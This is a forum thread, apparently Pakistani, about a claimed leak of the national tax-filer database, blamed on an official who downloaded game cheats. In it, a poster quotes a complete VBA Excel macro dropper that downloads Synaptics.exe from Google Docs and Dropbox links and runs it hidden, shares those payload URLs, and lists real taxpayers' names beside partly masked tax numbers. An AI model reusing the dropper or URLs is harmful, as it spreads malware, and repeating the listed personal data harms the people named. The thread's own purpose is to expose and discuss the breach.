NTN Database hacked due to some nitwit moron trying PUBG Hacks on official work computers!

[Jack Squire]

Salam Everyone!

Today I am beyond disappointed in the IT infrastructure of Pakistan - may it be the govt websites, the supreme court website -- firstly, they all appear to be designed in the 90s OR perhaps they hired some dumbass kid to design and do all the graphics - just look at them, stretched pics, no sense of functionality and design flow!! But I am not here to rant about the idiots who unfortunately get hired due to their chacha mama into our bureaucracy-- No,

I am extremely disappointed since as a tax filer my personal tax info has been HACKED due to some moronic idiot(s) who decided to download a game's (PUBG) hacks on to his work computer that has sensitive information!!! WHO DOES THAT!!!??? And lets assume that they were an idiot and thus they did, why did the IT Policies in place at this govt facility not prevent this leak? Why did their security software not prompt that this hack that was downloaded is maliciously trying to send info out (to its creator) without any proper permissions?!!

I am not sure whether this is the complete list of tax filers of Pakistan, however the last entry is on line 1999361* -- this leak is from Jun 16-2019 -- after doing some reverse engineering I was able to crack the hackers password - it seems to be communicating to 2 dropbox and 1 google docs accounts which although appear to be not active are indeed still up since everytime I run the infected file this NTN excel sheet gets downloaded automaticall ...

implying this virus is still replicating and growing exponentially carrying along with it all of Pakistan's Tax Filers Info.... I was thinking of reporting it to the cybercrime center but clearly they are equally as incompetent since they still have not migrated to https.... and their website looks equally sketchy... I can provide the related docs to someone in authority who is willing to investigate this leak and fire the moron who decided to download illegal hacks on their work computer!

 

[Jack Squire]

Oh and just as proof so y'all dont think I am trolling heres the last few entries from the spreadsheet... obviously I changed their NTNs for anonymity...

1999354​	822033xxxxxx	Syed Shafique Ul Hassan Gillani
1999355​	822031xxxxxx	ABID HUSSAIN QURESHI
1999356​	135030xxxxxx	Sakhi Sultan
1999357​	822033xxxxxx	Jawad Latif
1999358​	822035xxxxxx	Naveed Ahmed Khan
1999359​	822032xxxxxx	Sajjad Ahmed lone
1999360​	822039xxxxxx	Safeer Ahmed
1999361​	374054xxxxxx	Raja Adeel Ishfaq

 

[آخر الزماں]

oops!
that is crap really by govt institution.

 

[Billo Rani]

You should report it so further/new entries are atleast not uploaded. No guarantee any action will be taken due to the incompetence of Pakistani govt employees. That's almost 20 million entries so most likely everyone who is filer. If you have the passwords to the dropbox and google drive accounts, can you change them?

 

[Jack Squire]

oops!
that is crap really by govt institution.

Not soo much of crap by Govt, but by the people who get employed there -- and we all know how that goes, its not based on merit (well maybe 30% is merit based, 70% is sifarish based), and that is where the problem lies! SOOOOO ANGRY!! I wish IK would do what China did, shoot the 500 most corrupt people in the country and watch how everyone falls in line!

 

[Jack Squire]

You should report it so further/new entries are atleast not uploaded. No guarantee any action will be taken due to the incompetence of Pakistani govt employees. That's almost 20 million entries so most likely everyone who is filer. If you have the passwords to the dropbox and google drive accounts, can you change them?

Cant access the accounts..... shows page not found... I believe the links therein are only to download the malicious files that then take over the local infected machine and starts to mine data and send info back to the attacker -heres the links --

URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"


This is the malicious code that does whatever it does (not really an expert at analyzing viruses - so if anyone wants to take a stab at it, please go ahead) -- its in Visual Basic - was embedded in a password protect excel macro...
<BEGIN MALICIOUS CODE>
Sub MPS()
Dim FSO As Object
Dim FP(1 To 3), TMP, URL(1 To 3) As String

Set FSO = CreateObject("scripting.filesystemobject")
FP(1) = ActiveWorkbook.Path & "\~$cache1"
FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"

If FSO.FileExists(FP(1)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(1), TMP
End If
Shell TMP, vbHide
ElseIf FSO.FileExists(FP(2)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(2), TMP
End If
Shell TMP, vbHide
Else
If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
ElseIf Not FSO.FileExists(TMP) Then
If FDW((URL(1)), (TMP)) Then
ElseIf FDW((URL(2)), (TMP)) Then
ElseIf FDW((URL(3)), (TMP)) Then
End If
If FSO.FileExists(TMP) Then
Shell TMP, vbHide
End If
Else
Shell TMP, vbHide
End If

End If

End Sub

Function FDW(MYU, NMA As String) As Boolean
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
If WinHttpReq Is Nothing Then
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
End If

WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
WinHttpReq.Option(6) = AllowRedirects
WinHttpReq.Open "GET", MYU, False
WinHttpReq.Send

If (WinHttpReq.Status = 200) Then
If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
FDW = True
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile (NMA)
oStream.Close
Else
FDW = False
End If
Else
FDW = False
End If
End Function
<> END MALICIOUS CODE <>

 

[Billo Rani]

Damn bro any recently upto date virus protection program would have prevented this. Advisory on synaptics.exe was issued in May 2019 or possibly even earlier. Also WTF they should be disabling running of macros at the domain level.

 

[Jack Squire]

Damn bro any recently upto date virus protection program would have prevented this. Advisory on synaptics.exe was issued in May 2019 or possibly even earlier. Also WTF they should be disabling running of macros at the domain level.

True, and not just disabling macros, heck implementing IT policies (like firewalls) that only allow certain pre-approved traffic thru and prevent any unauthorized communication over the local network --- heck I've worked on very sensitive info here in the west and we had a totally different network for development altogether -- that had no PHYSICAL access to the internet of the world and the only way we could access it was to be physically present in that room that logged everyone entering and leaving that room.....
Besides employees should have common sense NOT to download illegal hacks on work machines, and if someone does - well first its propagation should be stopped, second - that person should be fired!

 

[1234567]

Salam Everyone!
Today I am beyond disappointed in the IT infrastructure of Pakistan - may it be the govt websites, the supreme court website -- firstly, they all appear to be designed in the 90s OR perhaps they hired some dumbass kid to design and do all the graphics - just look at them, stretched pics, no sense of functionality and design flow!! But I am not here to rant about the idiots who unfortunately get hired due to their chacha mama into our bureaucracy-- No, I am extremely disappointed since as a tax filer my personal tax info has been HACKED due to some moronic idiot(s) who decided to download a game's (PUBG) hacks on to his work computer that has sensitive information!!! WHO DOES THAT!!!??? And lets assume that they were an idiot and thus they did, why did the IT Policies in place at this govt facility not prevent this leak? Why did their security software not prompt that this hack that was downloaded is maliciously trying to send info out (to its creator) without any proper permissions?!!
I am not sure whether this is the complete list of tax filers of Pakistan, however the last entry is on line 1999361* -- this leak is from Jun 16-2019 -- after doing some reverse engineering I was able to crack the hackers password - it seems to be communicating to 2 dropbox and 1 google docs accounts which although appear to be not active are indeed still up since everytime I run the infected file this NTN excel sheet gets downloaded automaticall ... implying this virus is still replicating and growing exponentially carrying along with it all of Pakistan's Tax Filers Info.... I was thinking of reporting it to the cybercrime center but clearly they are equally as incompetent since they still have not migrated to https.... and their website looks equally sketchy... I can provide the related docs to someone in authority who is willing to investigate this leak and fire the moron who decided to download illegal hacks on their work computer!

First thing first which unit downloaded it, grab that guy and make him/her pay all the expenses then put him/her in jail under Cyber security laws. Kotha ki aulad. Secondly who the fuck are security incharge, how come that stupid person was able to access and download such thing, why they didn't put filters there, why didn't they block the port numbers for that game. Hang the network security engineer.

 

[Notpersonal]

Works as a network security engineer for top Scandinavian cyber security company, company uses Cylance AI threat management solution and it's the best endpoint protection solution I have seen in my entire career

 

[Jack Squire]

Works as a network security engineer for top Scandinavian cyber security company, company uses Cylance AI threat management solution and it's the best endpoint protection solution I have seen in my entire career

To me equally important is having employees that are hired on merit - cuz clearly only sifarishi morons and patwaris are capable of such ignorant acts....

 

[Xiggs]

NADRA ke state of the art X386 computers hack hogaye? aakhir kitni der lagay hogi 14.4 kbps dial-up modem se data hacker ke paas upload honay mai?

jisne bhi PUBG khela hai, uski G ko FIA ko PUB bana dena chahiye.

 

[Notpersonal]

To me equally important is having employees that are hired on merit - cuz clearly only sifarishi morons and patwaris are capable of such ignorant acts....

It's not only employees, but also their managers or what ever level above on them , there must be internal security policies enforced on everyone , or maybe there is no culture of that there ?

 

[Jack Squire]

It's not only employees, but also their managers or what ever level above on them , there must be internal security policies enforced on everyone , or maybe there is no culture of that there ?

What concerns me the most is the fact that even Windows defender would have been able to catch this (did for me) -- and the fact that NTN database (contained in excel spreadsheet) got leaked sooo easily is just beyond what I can comprehend.... and yes when I say meritocracy - I mean even managers, directors and the likes --- heck I was just browsing SUPARCO's wikipedia page and came across an interesting fact -- 4 our to the 11 listed admins are only BS grads, heck even I feel like I am more qualified than these morons who've done nothing since inception.... whereas ISRO (Indian space agency) regularly launches satellites for other asian/african nations while earning revenue on the one hand to sending space probes to Mars at a fraction of the cost!!

 

[Notpersonal]

What concerns me the most is the fact that even Windows defender would have been able to catch this (did for me) -- and the fact that NTN database (contained in excel spreadsheet) got leaked sooo easily is just beyond what I can comprehend.... and yes when I say meritocracy - I mean even managers, directors and the likes --- heck I was just browsing SUPARCO's wikipedia page and came across an interesting fact -- 4 our to the 11 listed admins are only BS grads, heck even I feel like I am more qualified than these morons who've done nothing since inception.... whereas ISRO (Indian space agency) regularly launches satellites for other asian/african nations while earning revenue on the one hand to sending space probes to Mars at a fraction of the cost!!

Windows defender does not catch zero days or more sophisticated design scripts but I understand ur point , when you store public data then u have great responsibilities and strict laws must be established and enforced just like GDPR for Europe, security mechanisms adopted by companies storing public data uses top notch technologies, it is much more complex in detail to mention here, but using DLP modules together with proxies and good endpoint security management solution should do the job, but definitely people using these system must have security awareness and qualifications or experience and security policies must be enforced , there is much more to it,
As you also said one weakest link "shafisashi or incompetent" head having the responsibilities is sufficient to derail everything , I dont see it happening next 100 years because it's about culture ,